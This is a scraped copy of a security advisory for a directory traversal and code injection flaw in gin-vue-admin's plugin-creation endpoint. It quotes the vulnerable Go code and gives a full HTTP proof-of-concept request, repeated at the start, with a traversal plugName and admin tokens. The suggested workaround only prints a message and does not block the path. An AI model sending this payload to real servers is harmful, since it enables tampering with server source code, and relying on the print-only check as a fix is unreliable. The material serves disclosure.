Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU
Connection: close

{"plugName":"../../../server/","routerGroup":"111"	,"hasGlobal":true,"hasRequest":false,"hasResponse":false,"global":[{"key":"1","type":"1","desc":"1"},{"key":"type","value":"faspohgoahgioahgioahgioashogia","desc":"1","type":"string"}],"request":[{"key":"","type":"","desc":""}],"response":[{"key":"","type":"","desc":""}]}
```
By performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\代码审计\server to further compromise the system.
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/c2cad65a-6401-41c2-ba0d-6eb5e3760516)
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/681ca156-c125-4a9f-9443-825a34a89b2d)
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/6870ce90-8166-48c7-a02c-29c4429283d4)


### Patches
Please wait for the latest patch

### Workarounds
You can use the following filtering methods to rectify the directory traversal problem
if strings.Index(plugPath, "..") > -1 {
        fmt.Println("no bypass",plugPath)
    }
### References
https://github.com/flipped-aurora/gin-vue-admin


**Impact**

"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter."

Affected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys\_auto\_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.

func (autoApi \*AutoCodeApi) AutoPlug(c \*gin.Context) {
	var a system.AutoPlugReq
	err := c.ShouldBindJSON(&a)
	if err != nil {
		response.FailWithMessage(err.Error(), c)
		return
	}
	a.Snake \= strings.ToLower(a.PlugName)
	a.NeedModel \= a.HasRequest || a.HasResponse
	err \= autoCodeService.CreatePlug(a)
	if err != nil {
		global.GVA\_LOG.Error("预览失败!", zap.Error(err))
		response.FailWithMessage("预览失败", c)
		return
	}
	response.Ok(c)
}

The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.

type AutoPlugReq struct {
	PlugName    string         \`json:"plugName"\` // 必然大写开头
	Snake       string         \`json:"snake"\`    // 后端自动转为 snake
	RouterGroup string         \`json:"routerGroup"\`
	HasGlobal   bool           \`json:"hasGlobal"\`
	HasRequest  bool           \`json:"hasRequest"\`
	HasResponse bool           \`json:"hasResponse"\`
	NeedModel   bool           \`json:"needModel"\`
	Global      \[\]AutoPlugInfo \`json:"global,omitempty"\`
	Request     \[\]AutoPlugInfo \`json:"request,omitempty"\`
	Response    \[\]AutoPlugInfo \`json:"response,omitempty"\`
}

POC：

    POST /api/autoCode/createPlug HTTP/1.1
    Host: 192.168.31.18:8080
    Content-Length: 326
    Accept: application/json, text/plain, */*
    x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    x-user-id: 1
    Content-Type: application/json
    Origin: http://192.168.31.18:8080
    Referer: http://192.168.31.18:8080/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
    Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU
    Connection: close
    
    {"plugName":"../../../server/","routerGroup":"111"	,"hasGlobal":true,"hasRequest":false,"hasResponse":false,"global":[{"key":"1","type":"1","desc":"1"},{"key":"type","value":"faspohgoahgioahgioahgioashogia","desc":"1","type":"string"}],"request":[{"key":"","type":"","desc":""}],"response":[{"key":"","type":"","desc":""}]}
    

By performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\\代码审计\\server to further compromise the system.  
  
  

**Patches**

Please wait for the latest patch

**Workarounds**

You can use the following filtering methods to rectify the directory traversal problem  
if strings.Index(plugPath, "..") > -1 {  
        fmt.Println("no bypass",plugPath)  
    }

**References**

https://github.com/flipped-aurora/gin-vue-admin

**References**

*   GHSA-gv3w-m57p-3wc4
*   flipped-aurora/gin-vue-admin@b1b7427
*   https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys\_auto\_code.go:239

Tag

#ibm